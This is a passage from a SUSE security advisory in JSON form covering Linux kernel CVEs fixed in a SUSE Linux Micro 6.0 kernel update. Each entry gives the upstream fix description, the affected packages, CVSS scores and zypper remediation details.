"url": "https://www.suse.com/security/cve/CVE-2025-40320"
},
{
"category": "external",
"summary": "SUSE Bug 1254793 for CVE-2025-40320",
"url": "https://bugzilla.suse.com/1254793"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40320"
},
{
"cve": "CVE-2025-40321",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40321"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: brcmfmac: fix crash while sending Action Frames in standalone AP Mode\n\nCurrently, whenever there is a need to transmit an Action frame,\nthe brcmfmac driver always uses the P2P vif to send the \"actframe\" IOVAR to\nfirmware. The P2P interfaces were available when wpa_supplicant is managing\nthe wlan interface.\n\nHowever, the P2P interfaces are not created/initialized when only hostapd\nis managing the wlan interface. And if hostapd receives an ANQP Query REQ\nAction frame even from an un-associated STA, the brcmfmac driver tries\nto use an uninitialized P2P vif pointer for sending the IOVAR to firmware.\nThis NULL pointer dereferencing triggers a driver crash.\n\n [ 1417.074538] Unable to handle kernel NULL pointer dereference at virtual\n address 0000000000000000\n [...]\n [ 1417.075188] Hardware name: Raspberry Pi 4 Model B Rev 1.5 (DT)\n [...]\n [ 1417.075653] Call trace:\n [ 1417.075662] brcmf_p2p_send_action_frame+0x23c/0xc58 [brcmfmac]\n [ 1417.075738] brcmf_cfg80211_mgmt_tx+0x304/0x5c0 [brcmfmac]\n [ 1417.075810] cfg80211_mlme_mgmt_tx+0x1b0/0x428 [cfg80211]\n [ 1417.076067] nl80211_tx_mgmt+0x238/0x388 [cfg80211]\n [ 1417.076281] genl_family_rcv_msg_doit+0xe0/0x158\n [ 1417.076302] genl_rcv_msg+0x220/0x2a0\n [ 1417.076317] netlink_rcv_skb+0x68/0x140\n [ 1417.076330] genl_rcv+0x40/0x60\n [ 1417.076343] netlink_unicast+0x330/0x3b8\n [ 1417.076357] netlink_sendmsg+0x19c/0x3f8\n [ 1417.076370] __sock_sendmsg+0x64/0xc0\n [ 1417.076391] ____sys_sendmsg+0x268/0x2a0\n [ 1417.076408] ___sys_sendmsg+0xb8/0x118\n [ 1417.076427] __sys_sendmsg+0x90/0xf8\n [ 1417.076445] __arm64_sys_sendmsg+0x2c/0x40\n [ 1417.076465] invoke_syscall+0x50/0x120\n [ 1417.076486] el0_svc_common.constprop.0+0x48/0xf0\n [ 1417.076506] do_el0_svc+0x24/0x38\n [ 1417.076525] el0_svc+0x30/0x100\n [ 1417.076548] el0t_64_sync_handler+0x100/0x130\n [ 1417.076569] el0t_64_sync+0x190/0x198\n [ 1417.076589] Code: f9401e80 aa1603e2 f9403be1 5280e483 (f9400000)\n\nFix this, by always using the vif corresponding to the wdev on which the\nAction frame Transmission request was initiated by the userspace. This way,\neven if P2P vif is not available, the IOVAR is sent to firmware on AP vif\nand the ANQP Query RESP Action frame is transmitted without crashing the\ndriver.\n\nMove init_completion() for \"send_af_done\" from brcmf_p2p_create_p2pdev()\nto brcmf_p2p_attach(). Because the former function would not get executed\nwhen only hostapd is managing wlan interface, and it is not safe to do\nreinit_completion() later in brcmf_p2p_tx_action_frame(), without any prior\ninit_completion().\n\nAnd in the brcmf_p2p_tx_action_frame() function, the condition check for\nP2P Presence response frame is not needed, since the wpa_supplicant is\nproperly sending the P2P Presense Response frame on the P2P-GO vif instead\nof the P2P-Device vif.\n\n[Cc stable]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40321",
"url": "https://www.suse.com/security/cve/CVE-2025-40321"
},
{
"category": "external",
"summary": "SUSE Bug 1254795 for CVE-2025-40321",
"url": "https://bugzilla.suse.com/1254795"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40321"
},
{
"cve": "CVE-2025-40322",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40322"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: bitblit: bound-check glyph index in bit_putcs*\n\nbit_putcs_aligned()/unaligned() derived the glyph pointer from the\ncharacter value masked by 0xff/0x1ff, which may exceed the actual font\u0027s\nglyph count and read past the end of the built-in font array.\nClamp the index to the actual glyph count before computing the address.\n\nThis fixes a global out-of-bounds read reported by syzbot.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40322",
"url": "https://www.suse.com/security/cve/CVE-2025-40322"
},
{
"category": "external",
"summary": "SUSE Bug 1255092 for CVE-2025-40322",
"url": "https://bugzilla.suse.com/1255092"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40322"
},
{
"cve": "CVE-2025-40323",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40323"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbcon: Set fb_display[i]-\u003emode to NULL when the mode is released\n\nRecently, we discovered the following issue through syzkaller:\n\nBUG: KASAN: slab-use-after-free in fb_mode_is_equal+0x285/0x2f0\nRead of size 4 at addr ff11000001b3c69c by task syz.xxx\n...\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xab/0xe0\n print_address_description.constprop.0+0x2c/0x390\n print_report+0xb9/0x280\n kasan_report+0xb8/0xf0\n fb_mode_is_equal+0x285/0x2f0\n fbcon_mode_deleted+0x129/0x180\n fb_set_var+0xe7f/0x11d0\n do_fb_ioctl+0x6a0/0x750\n fb_ioctl+0xe0/0x140\n __x64_sys_ioctl+0x193/0x210\n do_syscall_64+0x5f/0x9c0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nBased on experimentation and analysis, during framebuffer unregistration,\nonly the memory of fb_info-\u003emodelist is freed, without setting the\ncorresponding fb_display[i]-\u003emode to NULL for the freed modes. This leads\nto UAF issues during subsequent accesses. Here\u0027s an example of reproduction\nsteps:\n1. With /dev/fb0 already registered in the system, load a kernel module\n to register a new device /dev/fb1;\n2. Set fb1\u0027s mode to the global fb_display[] array (via FBIOPUT_CON2FBMAP);\n3. Switch console from fb to VGA (to allow normal rmmod of the ko);\n4. Unload the kernel module, at this point fb1\u0027s modelist is freed, leaving\n a wild pointer in fb_display[];\n5. Trigger the bug via system calls through fb0 attempting to delete a mode\n from fb0.\n\nAdd a check in do_unregister_framebuffer(): if the mode to be freed exists\nin fb_display[], set the corresponding mode pointer to NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40323",
"url": "https://www.suse.com/security/cve/CVE-2025-40323"
},
{
"category": "external",
"summary": "SUSE Bug 1255094 for CVE-2025-40323",
"url": "https://bugzilla.suse.com/1255094"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40323"
},
{
"cve": "CVE-2025-40324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40324"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: Fix crash in nfsd4_read_release()\n\nWhen tracing is enabled, the trace_nfsd_read_done trace point\ncrashes during the pynfs read.testNoFh test.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40324",
"url": "https://www.suse.com/security/cve/CVE-2025-40324"
},
{
"category": "external",
"summary": "SUSE Bug 1254791 for CVE-2025-40324",
"url": "https://bugzilla.suse.com/1254791"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40324"
},
{
"cve": "CVE-2025-40328",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40328"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential UAF in smb2_close_cached_fid()\n\nfind_or_create_cached_dir() could grab a new reference after kref_put()\nhad seen the refcount drop to zero but before cfid_list_lock is acquired\nin smb2_close_cached_fid(), leading to use-after-free.\n\nSwitch to kref_put_lock() so cfid_release() is called with\ncfid_list_lock held, closing that gap.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40328",
"url": "https://www.suse.com/security/cve/CVE-2025-40328"
},
{
"category": "external",
"summary": "SUSE Bug 1254624 for CVE-2025-40328",
"url": "https://bugzilla.suse.com/1254624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40328"
},
{
"cve": "CVE-2025-40329",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40329"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/sched: Fix deadlock in drm_sched_entity_kill_jobs_cb\n\nThe Mesa issue referenced below pointed out a possible deadlock:\n\n[ 1231.611031] Possible interrupt unsafe locking scenario:\n\n[ 1231.611033] CPU0 CPU1\n[ 1231.611034] ---- ----\n[ 1231.611035] lock(\u0026xa-\u003exa_lock#17);\n[ 1231.611038] local_irq_disable();\n[ 1231.611039] lock(\u0026fence-\u003elock);\n[ 1231.611041] lock(\u0026xa-\u003exa_lock#17);\n[ 1231.611044] \u003cInterrupt\u003e\n[ 1231.611045] lock(\u0026fence-\u003elock);\n[ 1231.611047]\n *** DEADLOCK ***\n\nIn this example, CPU0 would be any function accessing job-\u003edependencies\nthrough the xa_* functions that don\u0027t disable interrupts (eg:\ndrm_sched_job_add_dependency(), drm_sched_entity_kill_jobs_cb()).\n\nCPU1 is executing drm_sched_entity_kill_jobs_cb() as a fence signalling\ncallback so in an interrupt context. It will deadlock when trying to\ngrab the xa_lock which is already held by CPU0.\n\nReplacing all xa_* usage by their xa_*_irq counterparts would fix\nthis issue, but Christian pointed out another issue: dma_fence_signal\ntakes fence.lock and so does dma_fence_add_callback.\n\n dma_fence_signal() // locks f1.lock\n -\u003e drm_sched_entity_kill_jobs_cb()\n -\u003e foreach dependencies\n -\u003e dma_fence_add_callback() // locks f2.lock\n\nThis will deadlock if f1 and f2 share the same spinlock.\n\nTo fix both issues, the code iterating on dependencies and re-arming them\nis moved out to drm_sched_entity_kill_jobs_work().\n\n[phasta: commit message nits]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40329",
"url": "https://www.suse.com/security/cve/CVE-2025-40329"
},
{
"category": "external",
"summary": "SUSE Bug 1254621 for CVE-2025-40329",
"url": "https://bugzilla.suse.com/1254621"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
